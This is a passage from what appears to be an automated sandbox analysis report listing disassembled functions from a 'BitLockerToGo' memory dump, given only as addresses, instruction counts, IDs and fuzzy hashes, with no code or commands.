                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitVariant
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                                            • Opcode ID: 8f42421b5a34cbd1ea63a1dbd956388e4192adbd851cf8b051e966a298af5424
                                                                                                                                                            • Instruction ID: 4a737b333be1bfd4886fd7e3ff4f4bf12e8d27856e1db329eb28ea58252ca875
                                                                                                                                                            • Opcode Fuzzy Hash: 8f42421b5a34cbd1ea63a1dbd956388e4192adbd851cf8b051e966a298af5424
                                                                                                                                                            • Instruction Fuzzy Hash: AE61D1B154D3858AD360EFA4C55139FBEE4EBA0349F058C6EE1D957282C7788988CB63
                                                                                                                                                            Function 0040A500 Relevance: 1.6, Strings: 1, Instructions: 351COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -
                                                                                                                                                            • API String ID: 0-2547889144
                                                                                                                                                            • Opcode ID: 7ee9bcf588f65f1444ea22e26e8508dac36d5332f033a78759580a77ea89dea4
                                                                                                                                                            • Instruction ID: 98c5736f1c62046899dd63fc815b8842e16dd6b81e5a04dc9e709d8ba707f7f6
                                                                                                                                                            • Opcode Fuzzy Hash: 7ee9bcf588f65f1444ea22e26e8508dac36d5332f033a78759580a77ea89dea4
                                                                                                                                                            • Instruction Fuzzy Hash: 3BC13A72A083514BC3158E19C88026BB7F3ABC1310F298A3ED5D16B3D5D739D8668BCB
                                                                                                                                                            Function 00436150 Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b
                                                                                                                                                            • API String ID: 0-3962175265
                                                                                                                                                            • Opcode ID: 5050dfb71579cd0ac46670f40a59a2a3a353c5d98a2708b5b24e43aea40e2542
                                                                                                                                                            • Instruction ID: 675377f4c844ffaf70bee54b356e33b2baee7c3e83ea2320f1a3454caa3e985f
                                                                                                                                                            • Opcode Fuzzy Hash: 5050dfb71579cd0ac46670f40a59a2a3a353c5d98a2708b5b24e43aea40e2542
                                                                                                                                                            • Instruction Fuzzy Hash: EBC18D7550D381AEC314EF68C55136BBFE1EB99314F168A2EE196873C2D6388944CB1B
                                                                                                                                                            Function 004223B5 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b
                                                                                                                                                            • API String ID: 0-3962175265
                                                                                                                                                            • Opcode ID: e543c5c2bf80db2471a58c4f4658035fc776f97658c76211d38f99a2db66c5bb
                                                                                                                                                            • Instruction ID: ed3160ece1e807094d5c6ae8dd45bd5f1e7a6ccf17d3e4561d5a1b2336db0d84
                                                                                                                                                            • Opcode Fuzzy Hash: e543c5c2bf80db2471a58c4f4658035fc776f97658c76211d38f99a2db66c5bb
                                                                                                                                                            • Instruction Fuzzy Hash: 49C1DFB5E00225CFDB14CF59D840BAEB7B2FF89300F1941AAD805AB391D774AD41CB95
                                                                                                                                                            Function 00423F07 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: `;B
                                                                                                                                                            • API String ID: 0-334945718
                                                                                                                                                            • Opcode ID: b3f5026e5e7a75d893355743d3fbb4d30d028e4ef454329ca58d3df04e397ee8
                                                                                                                                                            • Instruction ID: e79bb1402d12ca4e1089c1955cb7e4222a2cdeab4155382480d8270566b47ced
                                                                                                                                                            • Opcode Fuzzy Hash: b3f5026e5e7a75d893355743d3fbb4d30d028e4ef454329ca58d3df04e397ee8
                                                                                                                                                            • Instruction Fuzzy Hash: F691CDB4A0022ACBDB14CF58D8A1BAFB7B1FF46314F044589E855AF795E3789C41CB68
                                                                                                                                                            Function 00408190 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,
                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                            • Opcode ID: 9463f21d3a386412f113d05c36af7867a24f916eee9a2d18aad1f134eeafbec6
                                                                                                                                                            • Instruction ID: 9b2c1f9f41e92c6d73be052527cc2929a0c1719860e62f60c50834b869bd24a1
                                                                                                                                                            • Opcode Fuzzy Hash: 9463f21d3a386412f113d05c36af7867a24f916eee9a2d18aad1f134eeafbec6
                                                                                                                                                            • Instruction Fuzzy Hash: 2BB138702093819FC325CF58C99065BBBE0AFA9304F484D6DF5D997382D635EA18CBA7
                                                                                                                                                            Function 00435CD0 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,
                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                            • Opcode ID: 2808934bafdb7966d20f9fe154b1882749165c422553de4ad430e690aee30bf7
                                                                                                                                                            • Instruction ID: 5b6338d1b217ae5c192f88622f3ae62774a596c53e456cfa660523b97c4b3e29
                                                                                                                                                            • Opcode Fuzzy Hash: 2808934bafdb7966d20f9fe154b1882749165c422553de4ad430e690aee30bf7
                                                                                                                                                            • Instruction Fuzzy Hash: 6991F7B1D046418BCB00EF78D8823AEBFB0EB59314F14856EE555AB381E3388958CB67
                                                                                                                                                            Function 0043A830 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 476
                                                                                                                                                            • API String ID: 0-2414438958
                                                                                                                                                            • Opcode ID: d238cba89d2b446ef2cf8b45a61c53fc1e564a3143f5e9f7368e2ea65fca4a10
                                                                                                                                                            • Instruction ID: bc9afb301ff1bca705e4d9eb558f8990ed30c72b88509f03ea59d0d09f7ecfc7
                                                                                                                                                            • Opcode Fuzzy Hash: d238cba89d2b446ef2cf8b45a61c53fc1e564a3143f5e9f7368e2ea65fca4a10
                                                                                                                                                            • Instruction Fuzzy Hash: E351CEB5A482009BD314EF18D884B1BB3E2EB89704F1A992EE5C457351D336AC21CB9B
                                                                                                                                                            Function 0043E8D0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 2994545307-2766056989
                                                                                                                                                            • Opcode ID: 57e96b0382e3e6e538cf0754f49f31a1b9412dbe4e35433da61a86ebac4fb393
                                                                                                                                                            • Instruction ID: 410551a823e52c8c58878a7ff6f4a4ed23e8846fe5adf79326dadfa67cdcf047
                                                                                                                                                            • Opcode Fuzzy Hash: 57e96b0382e3e6e538cf0754f49f31a1b9412dbe4e35433da61a86ebac4fb393
                                                                                                                                                            • Instruction Fuzzy Hash: 1541D4B19093019BD714DF25C851B2BB7E2FFC5318F299A1DE5951B3E0D3399806CB8A
                                                                                                                                                            Function 0043F290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 2994545307-2766056989
                                                                                                                                                            • Opcode ID: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
                                                                                                                                                            • Instruction ID: 258c2d8b245171ec294772d4e7ba01eafee234919c336b5a4c57a840b15ac809
                                                                                                                                                            • Opcode Fuzzy Hash: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
                                                                                                                                                            • Instruction Fuzzy Hash: 2131BE715083058BC700DF18D8C066FBBF5FF89314F14992DEA8897361D339A909CB6A
                                                                                                                                                            Function 00413846 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 9
                                                                                                                                                            • API String ID: 0-2366072709
                                                                                                                                                            • Opcode ID: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
                                                                                                                                                            • Instruction ID: 5827e64180ae8c9ecbfa916954df96341b4aca638215bbeed84665d770a76ffe
                                                                                                                                                            • Opcode Fuzzy Hash: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
                                                                                                                                                            • Instruction Fuzzy Hash: E841007461C380AFC344CF24D49475ABBE0AB8A399F84592DE4CAA7262D374D994CB1A
                                                                                                                                                            Function 00409810 Relevance: .9, Instructions: 868COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 152f9c810d12586b04619026d9cb1e94cfdb1c9bbae0c707d46441bb48503418
                                                                                                                                                            • Instruction ID: 92dcab289aa62de7b9c8f2860d3ca437cb8ed3b928ab2de44b4819d1736fb165
                                                                                                                                                            • Opcode Fuzzy Hash: 152f9c810d12586b04619026d9cb1e94cfdb1c9bbae0c707d46441bb48503418
                                                                                                                                                            • Instruction Fuzzy Hash: 0F529E316183118BC725DF18D48026BB3E2FFD4318F29893ED996A7386D739AC56CB46
                                                                                                                                                            Function 00404FD0 Relevance: .7, Instructions: 711COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0e6245018b3af36d5f440a83f9b501c6fe337033f672261694fe6a957c5f91ef
                                                                                                                                                            • Instruction ID: 2a8b997cd6b374122676e3b10dc1b71284b029c115607e8b59cf8426b00fc424
                                                                                                                                                            • Opcode Fuzzy Hash: 0e6245018b3af36d5f440a83f9b501c6fe337033f672261694fe6a957c5f91ef
                                                                                                                                                            • Instruction Fuzzy Hash: BF52A1315087458FCB14CF18C0906ABBBE1FF89314F598A7EE89A67381D779A845CF89
                                                                                                                                                            Function 00405A40 Relevance: .6, Instructions: 592COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 01af1e3bcc74de70253ed4a434e978d21b2ce6edaadbcbc453918898fe344983
                                                                                                                                                            • Instruction ID: f1d7b7e80642e3a79158bdbd0d1fe1881403f8e5e5f554d2363d1c2836c476db
                                                                                                                                                            • Opcode Fuzzy Hash: 01af1e3bcc74de70253ed4a434e978d21b2ce6edaadbcbc453918898fe344983
                                                                                                                                                            • Instruction Fuzzy Hash: 3B320170514B118FC368CF29C69052BBBF1FF45710BA04A2ED6A7A7B90D73AB845CB18
                                                                                                                                                            Function 00407B80 Relevance: .5, Instructions: 525COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f0f618cf574632e83f4d3dc4512d14d9c676e5de105abb29ed967a83999bfed6
                                                                                                                                                            • Instruction ID: a7e2b0d83912b5998f30f5188c68aa7b7c4fe8239b963cf5c8fdd7a5a903873c
                                                                                                                                                            • Opcode Fuzzy Hash: f0f618cf574632e83f4d3dc4512d14d9c676e5de105abb29ed967a83999bfed6
                                                                                                                                                            • Instruction Fuzzy Hash: 6812C93564C3418FC708CF29C88176AFBE2BFC9304F18886DE48597391DA7AD806C796
                                                                                                                                                            Function 0043D5DE Relevance: .4, Instructions: 378COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a69d8c2be54ec1e9507784927750d37b642b746aee52f5a7387f18bc8be31710
                                                                                                                                                            • Instruction ID: 119d4748fadd799b7c911a5d7bb0b86b7be7e51743f141d384cb91f08efe248f
                                                                                                                                                            • Opcode Fuzzy Hash: a69d8c2be54ec1e9507784927750d37b642b746aee52f5a7387f18bc8be31710
                                                                                                                                                            • Instruction Fuzzy Hash: 4BD1067AA1C251CFC714CF28E84052AB7E1BF8A355F0A4ABDD89597391C734ED42CB85
                                                                                                                                                            Function 00430035 Relevance: .4, Instructions: 368COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f25ba54f22160b62489f088b280ed3c74614becc05bd915a8a94b8ab1d088ded
                                                                                                                                                            • Instruction ID: f08ba5470470ffa6063a8b3bc8b37c89f9044d94947f2a98b8b8c3894fdb4f30
                                                                                                                                                            • Opcode Fuzzy Hash: f25ba54f22160b62489f088b280ed3c74614becc05bd915a8a94b8ab1d088ded
                                                                                                                                                            • Instruction Fuzzy Hash: 1AF181B1919B808AC310BF74DD0631BBEF1EF9274AF49895DD4C84B242E274965C9FA3
                                                                                                                                                            Function 004306F7 Relevance: .4, Instructions: 363COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b14d02fc5997136521a6d95f2f9aacbedaf3fba7fc823ef32d6250139b3adea6
                                                                                                                                                            • Instruction ID: 9fb43e77259d6964725a8e00412b911133945f0e3cf68f0fdd0b3c6d9e57c9ae
                                                                                                                                                            • Opcode Fuzzy Hash: b14d02fc5997136521a6d95f2f9aacbedaf3fba7fc823ef32d6250139b3adea6
                                                                                                                                                            • Instruction Fuzzy Hash: 34F16FB1919B808AC300BF74DD0631BBEF1EF5274AF49885DE4C84B242E275965C9FA3
                                                                                                                                                            Function 004104D1 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
                                                                                                                                                            • Instruction ID: bf4e49d12bc1c1665af36ef709e149d706979a2f605b67f4024150dc15a0677b
                                                                                                                                                            • Opcode Fuzzy Hash: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
                                                                                                                                                            • Instruction Fuzzy Hash: 6FC157B150C3808BD325EF19C480B9FBBE5AF96305F04092DE5C897392E37A9995CB5B
                                                                                                                                                            Function 00408870 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7240b8de29aa9ea456cfb7fec80e2f6c6a8e61c11f2659c23afef4199018a829
                                                                                                                                                            • Instruction ID: 024cdc7791de9666e079f96fcf25aeb5d0b7ea6c5449eb9628e7a889d73add34
                                                                                                                                                            • Opcode Fuzzy Hash: 7240b8de29aa9ea456cfb7fec80e2f6c6a8e61c11f2659c23afef4199018a829
                                                                                                                                                            • Instruction Fuzzy Hash: A0C15BB2A487418FC360CF68CC86BABB7F1BF85318F08492DD1D9D6242E778A155CB46
                                                                                                                                                            Function 00421DB5 Relevance: .3, Instructions: 302COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f86dc34d9228e07512daa7122b746a33267282d4b420ae713972d3ba4e0960ab
                                                                                                                                                            • Instruction ID: 51c07979957a548329d311152b826891065da3c05e7d59a06228ef43514d0c60
                                                                                                                                                            • Opcode Fuzzy Hash: f86dc34d9228e07512daa7122b746a33267282d4b420ae713972d3ba4e0960ab
                                                                                                                                                            • Instruction Fuzzy Hash: C7A11336E05250CFDB188F38E85079DB7B2AF4B320F6982A9E455672A2C7759D01CB54
                                                                                                                                                            Function 00418FD5 Relevance: .3, Instructions: 293COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7975fa0fe6a312e73b73def21946adc82cbb3bca22f600f7caed32f8a8cef404
                                                                                                                                                            • Instruction ID: 44a10b8166b9542d1297fef0e512eb72cf3d4b744219662fe86510ca9cb9bf4d
                                                                                                                                                            • Opcode Fuzzy Hash: 7975fa0fe6a312e73b73def21946adc82cbb3bca22f600f7caed32f8a8cef404
                                                                                                                                                            • Instruction Fuzzy Hash: 48C16BF2819B81AAD310BB74D90630ABEF0EB6130AF058D6DD9D84B352E275855CDF63
                                                                                                                                                            Function 0042EF89 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: dabbc883d107179a82327ff4fed8f602213700a0700e2ea5b86482edca5589ba
                                                                                                                                                            • Instruction ID: ab4d46f6886bff64f1ff400ef49edc62abd5e6fecd7fd0d2724ed8df8bc51dab
                                                                                                                                                            • Opcode Fuzzy Hash: dabbc883d107179a82327ff4fed8f602213700a0700e2ea5b86482edca5589ba
                                                                                                                                                            • Instruction Fuzzy Hash: 76B1D6B15187818BC304EFB4DA1621EBEA0EF52309F85892DD9C94B3C2E7B4955CC7A7
                                                                                                                                                            Function 0043F9E0 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
                                                                                                                                                            • Instruction ID: f79cfc653f8a236ff0e4eb88f2fa697002daeed1f849f636e8105431ebf0ed9b
                                                                                                                                                            • Opcode Fuzzy Hash: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
                                                                                                                                                            • Instruction Fuzzy Hash: 1A91CF74A083068FC714DF18D890A2BB3E1FF89754F14A92DE8958B361E734EC15CB8A
                                                                                                                                                            Function 0042E2AC Relevance: .3, Instructions: 285COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 08f125c79503abe8501a08a4e148f1f8a53f9b7536fec694ae15afa04bf3d2c3
                                                                                                                                                            • Instruction ID: 74229395bd622ba83758d914417b85b284bfe95890b0f9ead982590fdd29cebe
                                                                                                                                                            • Opcode Fuzzy Hash: 08f125c79503abe8501a08a4e148f1f8a53f9b7536fec694ae15afa04bf3d2c3
                                                                                                                                                            • Instruction Fuzzy Hash: D4B1D6B15187818BC304EFB4DA1521EBEA0EF5230AF85892DD5C94B3C2E7B8955CC7A7
                                                                                                                                                            Function 00411B6E Relevance: .3, Instructions: 281COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e7341bf004560a97d8c87bf88d6869f2221bb2125ae592de106e76b6c34dd79e
                                                                                                                                                            • Instruction ID: d4f95eff0c6f4f7f39b7b4ee0f821fb604f172ee2f3bd783a0200100271ac5b8
                                                                                                                                                            • Opcode Fuzzy Hash: e7341bf004560a97d8c87bf88d6869f2221bb2125ae592de106e76b6c34dd79e
                                                                                                                                                            • Instruction Fuzzy Hash: 1CA1E175A083118BC724CF29C89066BB3E2FFC9714F094A6EE995973A1E738DC51C786
                                                                                                                                                            Function 0043F6F0 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                            Download Yara Rule
